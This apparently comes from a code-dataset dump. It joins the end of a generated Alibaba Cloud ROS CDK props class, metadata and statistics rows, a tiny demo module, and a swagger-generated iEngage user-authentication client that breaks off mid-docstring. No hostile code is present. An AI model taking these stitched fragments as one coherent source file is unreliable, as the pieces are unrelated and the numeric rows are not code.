    jsii_struct_bases=[],
    name_mapping={
        "app_id": "appId",
        "internet": "internet",
        "internet_slb_id": "internetSlbId",
        "intranet": "intranet",
        "intranet_slb_id": "intranetSlbId",
    },
)
class SlbBindingProps:
    def __init__(
        self,
        *,
        app_id: typing.Union[builtins.str, ros_cdk_core.IResolvable],
        internet: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
        internet_slb_id: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
        intranet: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
        intranet_slb_id: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
    ) -> None:
        '''Properties for defining a ``ALIYUN::SAE::SlbBinding``.
        :param app_id: Property appId: Successful application deployment target ID.
        :param internet: Property internet: Binding public SLB. For example: [{ "port": 80, "targetPort": 8080, "protocol": "TCP"}], shows a container port 8080 through port 80 slb exposed service, the protocol is TCP, the blank is ignored.
        :param internet_slb_id: Property internetSlbId: Use SLB purchased specified, currently only supports non-shared examples.
        :param intranet: Property intranet: Bind private SLB. For example: [{ "port": 80, "targetPort": 8080, "protocol": "TCP"}], shows a container port 8080 through port 80 slb exposed service, the protocol is TCP, the blank is ignored.
        :param intranet_slb_id: Property intranetSlbId: Use SLB purchased specified, currently only supports non-shared examples.
        '''
        # ``app_id`` is the only mandatory property; the optional ones are
        # stored only when the caller actually supplied a value.
        self._values: typing.Dict[str, typing.Any] = {"app_id": app_id}
        for key, value in (
            ("internet", internet),
            ("internet_slb_id", internet_slb_id),
            ("intranet", intranet),
            ("intranet_slb_id", intranet_slb_id),
        ):
            if value is not None:
                self._values[key] = value

    @builtins.property
    def app_id(self) -> typing.Union[builtins.str, ros_cdk_core.IResolvable]:
        '''Property appId: Successful application deployment target ID.'''
        value = self._values.get("app_id")
        assert value is not None, "Required property 'app_id' is missing"
        return typing.cast(typing.Union[builtins.str, ros_cdk_core.IResolvable], value)

    @builtins.property
    def internet(
        self,
    ) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
        '''Property internet: Binding public SLB.

        For example: [{ "port": 80, "targetPort": 8080, "protocol": "TCP"}], shows a container port 8080 through port 80 slb exposed service, the protocol is TCP, the blank is ignored.
        '''
        return typing.cast(
            typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
            self._values.get("internet"),
        )

    @builtins.property
    def internet_slb_id(
        self,
    ) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
        '''Property internetSlbId: Use SLB purchased specified, currently only supports non-shared examples.'''
        return typing.cast(
            typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
            self._values.get("internet_slb_id"),
        )

    @builtins.property
    def intranet(
        self,
    ) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
        '''Property intranet: Bind private SLB.

        For example: [{ "port": 80, "targetPort": 8080, "protocol": "TCP"}], shows a container port 8080 through port 80 slb exposed service, the protocol is TCP, the blank is ignored.
        '''
        return typing.cast(
            typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
            self._values.get("intranet"),
        )

    @builtins.property
    def intranet_slb_id(
        self,
    ) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
        '''Property intranetSlbId: Use SLB purchased specified, currently only supports non-shared examples.'''
        return typing.cast(
            typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
            self._values.get("intranet_slb_id"),
        )

    def __eq__(self, rhs: typing.Any) -> builtins.bool:
        """Equal only when the other object is the same props type with identical values."""
        if not isinstance(rhs, self.__class__):
            return False
        return rhs._values == self._values

    def __ne__(self, rhs: typing.Any) -> builtins.bool:
        """Logical inverse of ``__eq__``."""
        return not (rhs == self)

    def __repr__(self) -> str:
        """Debug representation listing every stored key/value pair."""
        fields = ", ".join(f"{key}={value!r}" for key, value in self._values.items())
        return "SlbBindingProps(%s)" % fields
# Public surface of this generated module: each construct class plus its
# props type and the lower-level Ros* counterparts.
__all__ = [
    "Application",
    "ApplicationProps",
    "Namespace",
    "NamespaceProps",
    "RosApplication",
    "RosApplicationProps",
    "RosNamespace",
    "RosNamespaceProps",
    "RosSlbBinding",
    "RosSlbBindingProps",
    "SlbBinding",
    "SlbBindingProps",
]

# jsii boilerplate — presumably resolves/publishes the deferred type
# references declared above; TODO confirm against the ``publication`` package.
publication.publish()
| 44.914978
| 344
| 0.670565
| 13,471
| 113,051
| 5.464628
| 0.031698
| 0.034477
| 0.055424
| 0.112682
| 0.940962
| 0.936819
| 0.933559
| 0.930679
| 0.929212
| 0.924675
| 0
| 0.002252
| 0.21447
| 113,051
| 2,516
| 345
| 44.93283
| 0.826688
| 0.258414
| 0
| 0.832019
| 0
| 0
| 0.093725
| 0.017435
| 0
| 0
| 0
| 0
| 0.011522
| 1
| 0.138872
| false
| 0
| 0.006064
| 0.016374
| 0.256519
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5b30fd496b963e697aa8e0003029d891d7b46554
| 104
|
py
|
Python
|
OOP/my_module.py
|
Architect0711/PythonReference
|
c96a745aa5bf407c843e6e6f8e2b0cc300d98379
|
[
"MIT"
] | null | null | null |
OOP/my_module.py
|
Architect0711/PythonReference
|
c96a745aa5bf407c843e6e6f8e2b0cc300d98379
|
[
"MIT"
] | null | null | null |
OOP/my_module.py
|
Architect0711/PythonReference
|
c96a745aa5bf407c843e6e6f8e2b0cc300d98379
|
[
"MIT"
] | null | null | null |
def method_1():
    """Demo function: print which module-level function was invoked."""
    message = "my_module.method_1()"
    print(message)
def method_2():
    """Demo function: print which module-level function was invoked."""
    message = "my_module.method_2()"
    print(message)
| 20.8
| 33
| 0.634615
| 16
| 104
| 3.75
| 0.4375
| 0.3
| 0.433333
| 0.633333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.046512
| 0.173077
| 104
| 5
| 34
| 20.8
| 0.651163
| 0
| 0
| 0
| 0
| 0
| 0.380952
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0
| 0.5
| 0.5
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
753212178d6a56843f43b80e9e337f9f296b8277
| 48,934
|
py
|
Python
|
iengage_client/apis/user_authentication_api.py
|
iEngage/python-sdk
|
76cc6ed697d7599ce9af74124c12d33ad5aff419
|
[
"Apache-2.0"
] | null | null | null |
iengage_client/apis/user_authentication_api.py
|
iEngage/python-sdk
|
76cc6ed697d7599ce9af74124c12d33ad5aff419
|
[
"Apache-2.0"
] | null | null | null |
iengage_client/apis/user_authentication_api.py
|
iEngage/python-sdk
|
76cc6ed697d7599ce9af74124c12d33ad5aff419
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
iEngage 2.0 API
This API enables Intelligent Engagement for your Business. iEngage is a platform that combines process, augmented intelligence and rewards to help you intelligently engage customers.
OpenAPI spec version: 2.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class UserAuthenticationApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
    """Bind this API to an ``ApiClient``.

    When ``api_client`` is supplied it is used directly; otherwise the
    client shared on the global ``Configuration`` is reused, being created
    lazily on first use.
    """
    config = Configuration()
    if api_client:
        self.api_client = api_client
        return
    # No client supplied: fall back to (and lazily populate) the
    # configuration-wide client.
    if not config.api_client:
        config.api_client = ApiClient()
    self.api_client = config.api_client
def add_notification_registered_id(self, registered_id, type, client_token, **kwargs):
    """
    Add device token

    Add a registered device token so the server can push notifications.
    Synchronous by default; pass a ``callback`` kwarg to make the request
    asynchronous — the request thread is returned and
    ``callback(response)`` is invoked when the response arrives.

    :param str registered_id: Registered device token to be added (required)
    :param str type: Type of device android, ios (required)
    :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required)
    :param str requester_id: requesterId can be user id OR email address.
    :param str access_token: Unique session token for user. To get access token user will have to authenticate
    :param callback function: The callback function for asynchronous request. (optional)
    :return: bool, or the request thread when called asynchronously.
    """
    kwargs['_return_http_data_only'] = True
    # Sync and async paths both resolve to the same helper call; it returns
    # the request thread when a callback is present, the payload otherwise.
    return self.add_notification_registered_id_with_http_info(registered_id, type, client_token, **kwargs)
def add_notification_registered_id_with_http_info(self, registered_id, type, client_token, **kwargs):
    """
    Add device token
    Add device token to push notification from server
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.add_notification_registered_id_with_http_info(registered_id, type, client_token, callback=callback_function)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str registered_id: Registered device token to be added (required)
    :param str type: Type of device android, ios (required)
    :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required)
    :param str requester_id: requesterId can be user id OR email address.
    :param str access_token: Unique session token for user. To get access token user will have to authenticate
    :return: bool
        If the method is called asynchronously,
        returns the request thread.
    """
    all_params = ['registered_id', 'type', 'client_token', 'requester_id', 'access_token']
    all_params.append('callback')
    all_params.append('_return_http_data_only')
    # NOTE: ``locals()`` snapshots the named parameters above into ``params``;
    # validated **kwargs entries are then folded into the same dict, so the
    # statement order here is load-bearing.
    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method add_notification_registered_id" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'registered_id' is set
    if ('registered_id' not in params) or (params['registered_id'] is None):
        raise ValueError("Missing the required parameter `registered_id` when calling `add_notification_registered_id`")
    # verify the required parameter 'type' is set
    if ('type' not in params) or (params['type'] is None):
        raise ValueError("Missing the required parameter `type` when calling `add_notification_registered_id`")
    # verify the required parameter 'client_token' is set
    if ('client_token' not in params) or (params['client_token'] is None):
        raise ValueError("Missing the required parameter `client_token` when calling `add_notification_registered_id`")
    resource_path = '/devices'.replace('{format}', 'json')
    path_params = {}
    query_params = {}
    # Identity/auth values travel as HTTP headers.
    header_params = {}
    if 'requester_id' in params:
        header_params['requesterId'] = params['requester_id']
    if 'access_token' in params:
        header_params['accessToken'] = params['access_token']
    if 'client_token' in params:
        header_params['clientToken'] = params['client_token']
    # Request payload is sent as form fields (see Content-Type below).
    form_params = []
    local_var_files = {}
    if 'registered_id' in params:
        form_params.append(('registeredId', params['registered_id']))
    if 'type' in params:
        form_params.append(('type', params['type']))
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json'])
    if not header_params['Accept']:
        del header_params['Accept']
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/x-www-form-urlencoded'])
    # Authentication setting
    auth_settings = ['default']
    # Dispatch through the shared client; returns bool, or the request
    # thread when a callback was supplied.
    return self.api_client.call_api(resource_path, 'POST',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='bool',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'))
def add_user(self, screen_name, email_id, password, client_token, **kwargs):
    """
    Add/Register new user

    Register a new user and return the created user. Synchronous by
    default; pass a ``callback`` kwarg to make the request asynchronous —
    the request thread is returned and ``callback(response)`` fires on
    completion.

    :param str screen_name: unique ID of user (required)
    :param str email_id: email ID (required)
    :param str password: password (required)
    :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required)
    :param str first_name: first name
    :param str middle_name: middle name
    :param str last_name: last name
    :param int birth_day: birth day
    :param int birth_month: birth month
    :param int birth_year: birth year
    :param str addition_information: addition information
    :param callback function: The callback function for asynchronous request. (optional)
    :return: VerveResponseUser, or the request thread when called asynchronously.
    """
    kwargs['_return_http_data_only'] = True
    # Sync and async paths both resolve to the same helper call.
    return self.add_user_with_http_info(screen_name, email_id, password, client_token, **kwargs)
def add_user_with_http_info(self, screen_name, email_id, password, client_token, **kwargs):
    """
    Add/Register new user
    Add/Register new user. Returns the user
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.add_user_with_http_info(screen_name, email_id, password, client_token, callback=callback_function)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str screen_name: unique ID of user (required)
    :param str email_id: email ID (required)
    :param str password: password (required)
    :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required)
    :param str first_name: first name
    :param str middle_name: middle name
    :param str last_name: last name
    :param int birth_day: birth day
    :param int birth_month: birth month
    :param int birth_year: birth year
    :param str addition_information: addition information
    :return: VerveResponseUser
        If the method is called asynchronously,
        returns the request thread.
    """
    all_params = ['screen_name', 'email_id', 'password', 'client_token', 'first_name', 'middle_name', 'last_name', 'birth_day', 'birth_month', 'birth_year', 'addition_information']
    all_params.append('callback')
    all_params.append('_return_http_data_only')
    # NOTE: ``locals()`` snapshots the named parameters above into ``params``;
    # validated **kwargs entries are folded into the same dict, so statement
    # order here is load-bearing.
    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method add_user" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'screen_name' is set
    if ('screen_name' not in params) or (params['screen_name'] is None):
        raise ValueError("Missing the required parameter `screen_name` when calling `add_user`")
    # verify the required parameter 'email_id' is set
    if ('email_id' not in params) or (params['email_id'] is None):
        raise ValueError("Missing the required parameter `email_id` when calling `add_user`")
    # verify the required parameter 'password' is set
    if ('password' not in params) or (params['password'] is None):
        raise ValueError("Missing the required parameter `password` when calling `add_user`")
    # verify the required parameter 'client_token' is set
    if ('client_token' not in params) or (params['client_token'] is None):
        raise ValueError("Missing the required parameter `client_token` when calling `add_user`")
    resource_path = '/users'.replace('{format}', 'json')
    path_params = {}
    query_params = {}
    header_params = {}
    if 'client_token' in params:
        header_params['clientToken'] = params['client_token']
    # Every user field is posted as a form parameter; optional fields are
    # included only when present in ``params``.
    form_params = []
    local_var_files = {}
    if 'screen_name' in params:
        form_params.append(('screenName', params['screen_name']))
    if 'first_name' in params:
        form_params.append(('firstName', params['first_name']))
    if 'middle_name' in params:
        form_params.append(('middleName', params['middle_name']))
    if 'last_name' in params:
        form_params.append(('lastName', params['last_name']))
    if 'email_id' in params:
        form_params.append(('emailId', params['email_id']))
    if 'password' in params:
        form_params.append(('password', params['password']))
    if 'birth_day' in params:
        form_params.append(('birthDay', params['birth_day']))
    if 'birth_month' in params:
        form_params.append(('birthMonth', params['birth_month']))
    if 'birth_year' in params:
        form_params.append(('birthYear', params['birth_year']))
    if 'addition_information' in params:
        form_params.append(('additionInformation', params['addition_information']))
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json'])
    if not header_params['Accept']:
        del header_params['Accept']
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/x-www-form-urlencoded'])
    # Authentication setting
    auth_settings = ['default']
    # Dispatch through the shared client; returns VerveResponseUser, or the
    # request thread when a callback was supplied.
    return self.api_client.call_api(resource_path, 'POST',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='VerveResponseUser',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'))
def authenticate(self, user_name, password, client_token, **kwargs):
    """
    Authenticate User

    Authenticate with username &amp; password. Synchronous by default; pass a
    ``callback`` kwarg to make the request asynchronous — the request
    thread is returned and ``callback(response)`` fires on completion.

    :param str user_name: User name (required)
    :param str password: Password (required)
    :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required)
    :param callback function: The callback function for asynchronous request. (optional)
    :return: User, or the request thread when called asynchronously.
    """
    kwargs['_return_http_data_only'] = True
    # Sync and async paths both resolve to the same helper call.
    return self.authenticate_with_http_info(user_name, password, client_token, **kwargs)
def authenticate_with_http_info(self, user_name, password, client_token, **kwargs):
    """
    Authenticate User
    Authenticate with username & password
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.authenticate_with_http_info(user_name, password, client_token, callback=callback_function)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str user_name: User name (required)
    :param str password: Password (required)
    :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required)
    :return: User
        If the method is called asynchronously,
        returns the request thread.
    """
    all_params = ['user_name', 'password', 'client_token']
    all_params.append('callback')
    all_params.append('_return_http_data_only')
    # NOTE: ``locals()`` snapshots the named parameters above into ``params``;
    # validated **kwargs entries are folded into the same dict, so statement
    # order here is load-bearing.
    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method authenticate" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'user_name' is set
    if ('user_name' not in params) or (params['user_name'] is None):
        raise ValueError("Missing the required parameter `user_name` when calling `authenticate`")
    # verify the required parameter 'password' is set
    if ('password' not in params) or (params['password'] is None):
        raise ValueError("Missing the required parameter `password` when calling `authenticate`")
    # verify the required parameter 'client_token' is set
    if ('client_token' not in params) or (params['client_token'] is None):
        raise ValueError("Missing the required parameter `client_token` when calling `authenticate`")
    resource_path = '/authenticate'.replace('{format}', 'json')
    path_params = {}
    query_params = {}
    # NOTE(review): credentials are sent as plain headers on a GET request —
    # presumably the service mandates this; confirm transport is HTTPS-only.
    header_params = {}
    if 'user_name' in params:
        header_params['userName'] = params['user_name']
    if 'password' in params:
        header_params['password'] = params['password']
    if 'client_token' in params:
        header_params['clientToken'] = params['client_token']
    form_params = []
    local_var_files = {}
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json'])
    if not header_params['Accept']:
        del header_params['Accept']
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json'])
    # Authentication setting
    auth_settings = ['default']
    # Dispatch through the shared client; returns User, or the request
    # thread when a callback was supplied.
    return self.api_client.call_api(resource_path, 'GET',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='User',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'))
def change_password(self, current_password, new_password, requester_id, client_token, **kwargs):
    """
    Change password

    Change the requesting user's password; returns True on success.
    Synchronous by default; pass a ``callback`` kwarg to make the request
    asynchronous — the request thread is returned and
    ``callback(response)`` fires on completion.

    :param str current_password: Current password (required)
    :param str new_password: New password (required)
    :param str requester_id: requesterId can be user id OR email address. (required)
    :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required)
    :param str access_token: Unique session token for user. To get access token user will have to authenticate
    :param callback function: The callback function for asynchronous request. (optional)
    :return: bool, or the request thread when called asynchronously.
    """
    kwargs['_return_http_data_only'] = True
    # Sync and async paths both resolve to the same helper call.
    return self.change_password_with_http_info(current_password, new_password, requester_id, client_token, **kwargs)
def change_password_with_http_info(self, current_password, new_password, requester_id, client_token, **kwargs):
    """
    Change password
    Allows the user to change password. Returns true if successful
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.change_password_with_http_info(current_password, new_password, requester_id, client_token, callback=callback_function)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str current_password: Current password (required)
    :param str new_password: New password (required)
    :param str requester_id: requesterId can be user id OR email address. (required)
    :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required)
    :param str access_token: Unique session token for user. To get access token user will have to authenticate
    :return: bool
        If the method is called asynchronously,
        returns the request thread.
    """
    all_params = ['current_password', 'new_password', 'requester_id', 'client_token', 'access_token']
    all_params.append('callback')
    all_params.append('_return_http_data_only')
    # NOTE: ``locals()`` snapshots the named parameters above into ``params``;
    # validated **kwargs entries are folded into the same dict, so statement
    # order here is load-bearing.
    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method change_password" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'current_password' is set
    if ('current_password' not in params) or (params['current_password'] is None):
        raise ValueError("Missing the required parameter `current_password` when calling `change_password`")
    # verify the required parameter 'new_password' is set
    if ('new_password' not in params) or (params['new_password'] is None):
        raise ValueError("Missing the required parameter `new_password` when calling `change_password`")
    # verify the required parameter 'requester_id' is set
    if ('requester_id' not in params) or (params['requester_id'] is None):
        raise ValueError("Missing the required parameter `requester_id` when calling `change_password`")
    # verify the required parameter 'client_token' is set
    if ('client_token' not in params) or (params['client_token'] is None):
        raise ValueError("Missing the required parameter `client_token` when calling `change_password`")
    resource_path = '/users/password'.replace('{format}', 'json')
    path_params = {}
    query_params = {}
    # Identity/auth values travel as HTTP headers.
    header_params = {}
    if 'requester_id' in params:
        header_params['requesterId'] = params['requester_id']
    if 'access_token' in params:
        header_params['accessToken'] = params['access_token']
    if 'client_token' in params:
        header_params['clientToken'] = params['client_token']
    # Old and new passwords are posted as form fields.
    form_params = []
    local_var_files = {}
    if 'current_password' in params:
        form_params.append(('currentPassword', params['current_password']))
    if 'new_password' in params:
        form_params.append(('newPassword', params['new_password']))
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json'])
    if not header_params['Accept']:
        del header_params['Accept']
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/x-www-form-urlencoded'])
    # Authentication setting
    auth_settings = ['default']
    # Dispatch through the shared client; returns bool, or the request
    # thread when a callback was supplied.
    return self.api_client.call_api(resource_path, 'PUT',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='bool',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'))
def create_association(self, name, requester_id, client_token, **kwargs):
    """
    Create association

    Create an association and return it. Synchronous by default; pass a
    ``callback`` kwarg to make the request asynchronous — the request
    thread is returned and ``callback(response)`` fires on completion.

    :param str name: association name (required)
    :param str requester_id: requesterId can be user id OR email address. (required)
    :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required)
    :param str access_token: Unique session token for user. To get access token user will have to authenticate
    :param callback function: The callback function for asynchronous request. (optional)
    :return: VerveResponseAssociation, or the request thread when called asynchronously.
    """
    kwargs['_return_http_data_only'] = True
    # Sync and async paths both resolve to the same helper call.
    return self.create_association_with_http_info(name, requester_id, client_token, **kwargs)
def create_association_with_http_info(self, name, requester_id, client_token, **kwargs):
    """
    Create association
    Create association. Returns the association
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.create_association_with_http_info(name, requester_id, client_token, callback=callback_function)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str name: association name (required)
    :param str requester_id: requesterId can be user id OR email address. (required)
    :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required)
    :param str access_token: Unique session token for user. To get access token user will have to authenticate
    :return: VerveResponseAssociation
        If the method is called asynchronously,
        returns the request thread.
    """
    all_params = ['name', 'requester_id', 'client_token', 'access_token']
    all_params.append('callback')
    all_params.append('_return_http_data_only')
    # NOTE: ``locals()`` snapshots the named parameters above into ``params``;
    # validated **kwargs entries are folded into the same dict, so statement
    # order here is load-bearing.
    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method create_association" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'name' is set
    if ('name' not in params) or (params['name'] is None):
        raise ValueError("Missing the required parameter `name` when calling `create_association`")
    # verify the required parameter 'requester_id' is set
    if ('requester_id' not in params) or (params['requester_id'] is None):
        raise ValueError("Missing the required parameter `requester_id` when calling `create_association`")
    # verify the required parameter 'client_token' is set
    if ('client_token' not in params) or (params['client_token'] is None):
        raise ValueError("Missing the required parameter `client_token` when calling `create_association`")
    resource_path = '/associations'.replace('{format}', 'json')
    path_params = {}
    query_params = {}
    # Identity/auth values travel as HTTP headers.
    header_params = {}
    if 'requester_id' in params:
        header_params['requesterId'] = params['requester_id']
    if 'access_token' in params:
        header_params['accessToken'] = params['access_token']
    if 'client_token' in params:
        header_params['clientToken'] = params['client_token']
    # The association name is posted as a form field.
    form_params = []
    local_var_files = {}
    if 'name' in params:
        form_params.append(('name', params['name']))
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json'])
    if not header_params['Accept']:
        del header_params['Accept']
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/x-www-form-urlencoded'])
    # Authentication setting
    auth_settings = ['default']
    # Dispatch through the shared client; returns VerveResponseAssociation,
    # or the request thread when a callback was supplied.
    return self.api_client.call_api(resource_path, 'POST',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='VerveResponseAssociation',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'))
def delete_user(self, user_id, client_token, **kwargs):
    """
    Delete user
    Allows the user to delete user. Returns the deleted user

    Synchronous by default; supply a `callback` callable to make the request
    asynchronously, in which case the request thread is returned instead of
    the response data.

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param int user_id: userId (required)
    :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required)
    :return: VerveResponseUser
        If the method is called asynchronously,
        returns the request thread.
    """
    # Callers of this convenience wrapper always want just the data payload.
    kwargs['_return_http_data_only'] = True
    if kwargs.get('callback'):
        # Asynchronous path: hand back the request thread immediately.
        return self.delete_user_with_http_info(user_id, client_token, **kwargs)
    # Synchronous path: unwrap and return the response data.
    response = self.delete_user_with_http_info(user_id, client_token, **kwargs)
    return response
def delete_user_with_http_info(self, user_id, client_token, **kwargs):
    """
    Delete user
    Allows the user to delete user. Returns the deleted user

    Synchronous by default; supply a `callback` callable to make the request
    asynchronously, in which case the request thread is returned.

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param int user_id: userId (required)
    :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required)
    :return: VerveResponseUser
        If the method is called asynchronously,
        returns the request thread.
    """
    # Reject any keyword argument this endpoint does not understand.
    accepted_params = frozenset(
        ['user_id', 'client_token', 'callback', '_return_http_data_only'])
    params = {'user_id': user_id, 'client_token': client_token}
    for name, value in iteritems(kwargs):
        if name not in accepted_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method delete_user" % name
            )
        params[name] = value
    # Both positional parameters are mandatory and may not be None.
    if params.get('user_id') is None:
        raise ValueError("Missing the required parameter `user_id` when calling `delete_user`")
    if params.get('client_token') is None:
        raise ValueError("Missing the required parameter `client_token` when calling `delete_user`")
    resource_path = '/users/{userId}'.replace('{format}', 'json')
    path_params = {'userId': params['user_id']}
    header_params = {'clientToken': params['client_token']}
    # Negotiate the response content type; omit Accept if nothing matched.
    accept = self.api_client.select_header_accept(['application/json'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.select_header_content_type(
        ['application/x-www-form-urlencoded'])
    return self.api_client.call_api(resource_path, 'DELETE',
                                    path_params,
                                    {},   # no query parameters
                                    header_params,
                                    body=None,
                                    post_params=[],
                                    files={},
                                    response_type='VerveResponseUser',
                                    auth_settings=['default'],
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'))
def get_associations(self, requester_id, client_token, **kwargs):
    """
    Get list of associations
    Return the list of association

    Synchronous by default; supply a `callback` callable to make the request
    asynchronously, in which case the request thread is returned instead of
    the response data.

    :param callback function: The callback function
        for asynchronous request. (optional)
